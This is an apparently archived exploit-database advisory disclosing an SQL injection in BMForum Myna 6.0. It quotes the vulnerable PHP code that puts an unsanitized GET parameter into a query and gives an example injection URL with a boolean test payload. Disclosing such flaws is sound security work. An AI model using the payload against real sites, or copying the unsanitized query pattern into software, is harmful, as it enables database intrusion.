[] NeoSense

BMForum Myna 6.0 - SQL Injection

Author: Stephan Sattler
type: webapps
platform: php
port: 
date_added: 2011-03-07 
date_updated: 2011-03-07 
verified: 0 
codes: OSVDB-71022 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.combmf_myna_6.zip

# Author: Stephan Sattler
# Software Website: http://www.bmforum.com/
# Software Link: http://www.bmforum.com/down/
# Required: magic quotes = Off

[ Vulnerability ]

 /add-on/js_viewnew.php line 20++:

$length = $_GET['length'];
$forumid = $_GET['forumid'];
$num = $_GET['num'];
$forumnum=$forumid;

{....}

$query = "SELECT * FROM {$database_up}threads WHERE forumid='$forumid' ORDER BY 'changetime' DESC LIMIT 0,$num";

#Explanation:

$forumid($_GET['forumid']) isn't sanitized at all, an attacker could use this for an SQL-Injection.

#Example for an injection:

http://[site]/[folder]/js_viewnew.php?forumid=2'+AnD+1='1&num=1&length=1